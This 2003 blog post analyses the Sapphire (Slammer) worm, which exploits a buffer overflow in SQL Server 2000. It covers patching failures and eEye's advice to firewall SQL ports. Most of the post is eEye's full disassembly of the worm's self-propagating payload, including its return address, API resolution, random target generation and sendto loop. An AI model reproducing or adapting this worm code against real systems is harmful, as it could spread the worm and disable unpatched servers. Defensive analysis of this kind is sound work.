Microsoft SQL Server 2000 pre SP3 :: Sapphire Worm Analysis

By klsh on January 25, 2003 7:06 PM | | Comments (1) | TrackBacks (0)

This is YAMSV (Yet Another Microsoft Security Vulnerability).

Goodness, did the MCSE's fall asleep at the switch or what? This vulnerability discovered the year that Security became Microsoft's number one priority, didn't realize a functional exploit until now, although the patch was released last July.

The latest attack was likely to revive debate within the technology industry about the need for an Internet-wide monitoring center, which the Bush administration has proposed.
What good is a centralized monitoring effort if a vulnerability like this can sweep across the internet in hours? By their own admission, the Service Pack was too large to applied in any rapid reaction. Perhaps you see the following dialog:
"They're attacking sir! >> "How can you tell?" "Every MS SQL server that is internet attached has been rooted. "

The question is if everyone knew about the patch, why wasn't it applied? Incompetence perhaps?
"experts" claim 'PATCHING NOT SO EASY'

Most patches require a simple download and restart of the computer. But this patch required manual editing of critical system files, something many administrators just aren’t comfortable doing.
Save us from the manual editing please!

eEye does a good job explaining the problem.
I recommend reading their analysis.

eEye Digital Security: SQL Sapphire Worm Analysis

[...] this worm [... takes] advantage of a known vulnerability that has had a patch available for many months.

The worm is spreading using a buffer overflow to exploit a flaw in Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in July, 2002 by Next Generation Security Software Ltd. The buffer overflow exists because of the way SQL improperly handles data sent to its Microsoft SQL Monitor port. Attackers leveraging this vulnerability will be executing their code as SYSTEM, since Microsoft SQL Server 2000 runs with SYSTEM privileges.

Corrective Action:
We recommend that people immediately firewall SQL service ports at all of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port) to spread itself to a new system; however, it is safe practice to filter all SQL traffic at all gateways. The following is a list of SQL server ports:
ms-sql-s 1433/tcp #Microsoft-SQL-Server
ms-sql-s 1433/udp #Microsoft-SQL-Server
ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
ms-sql-m 1434/udp #Microsoft-SQL-Monitor

Here's the down and nasty code disassembled.


;SAPPHIRE WORM CODE DISASSEMBLED
;eEye Digital Security: January 25, 2003


push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ; Reconstruct session, after the overflow the payload buffer
; get's corrupted during program execution but before the
; payload is executed. .
xor ecx, ecx
mov cl, 18h

FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; kernel32
push ecx
push 746E756Fh ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; socket
mov cx, 6F74h
push ecx
push 646E6573h ; sendto
mov esi, 42AE1018h ; IAT from sqlsort
lea eax, [ebp-2Ch] ; (ws2_32.dll)
push eax
call dword ptr [esi] ; call loadlibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h] ; (kernel32.dll)
push eax
call dword ptr [esi] ; loadlibrary
push eax
mov esi, 42AE1010h ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint
jz short VALID_GP ; Check entry point fingerprint for getprocaddress, if it failes
; fall back to GetProcAddress entry in another DLL version.
; Undetermined what dll versions this will succedd on. Due
; to the lack of reliable importing this may not work across all
; dll versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C

VALID_GP:
call dword ptr [esi] ; GetProcAddress
call eax ; return from GetProcaddress = GetTickCount entrypoint
xor ecx, ecx
push ecx
push ecx
push eax
xor ecx, 9B040103h
xor ecx, 1010101h
push ecx ; 9A050002 = port 1434 / AF_INET
lea eax, [ebp-34h] ; (socket)
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
push 11h
push 2
push 2
call eax ; socket
push eax
lea eax, [ebp-3Ch] ; sendto
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
mov esi, eax ; save sendto -> esi
or ebx, ebx
xor ebx, 0FFD9613Ch

PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto
jmp short PRND ; Jump back to Pseudo Random Algorithm Start

Categories:

0 TrackBacks

Listed below are links to blogs that reference this entry: Microsoft SQL Server 2000 pre SP3 :: Sapphire Worm Analysis.

TrackBack URL for this entry: http://kennethhunt.com/mt/mt-tb.cgi/576

1 Comments

Kenneth said:

There's a vulnerability scanner free for download:
Retina Sapphire SQL Worm Scanner from eEye Digital Security
They want an online form filled out, but if you're running a Microsoft shop I think their software bares serious investigation.

The Retina Sapphire SQL Worm Scanner is a tool created by eEye for scanning up to 254 IP addresses at once to determine if any are vulnerable to the Microsoft SQL buffer overflow vulnerability that the recent Sapphire Worm uses to propagate. If an IP address is found to be vulnerable to the MS SQL flaw, the Retina Sapphire SQL Worm Scanner will flag that address as vulnerable. Administrators can then double-click on the IP address for a link to a website with information on how to fix the vulnerability.

January 26, 2003 5:25 PM

About this Entry

This page contains a single entry by klsh published on January 25, 2003 7:06 PM.

Still Googling Your Email :: ZOË Maintenance Release 0.3.6 was the previous entry in this blog.

SCADA :: Linux Makes Automation, Infrastructure Strides is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.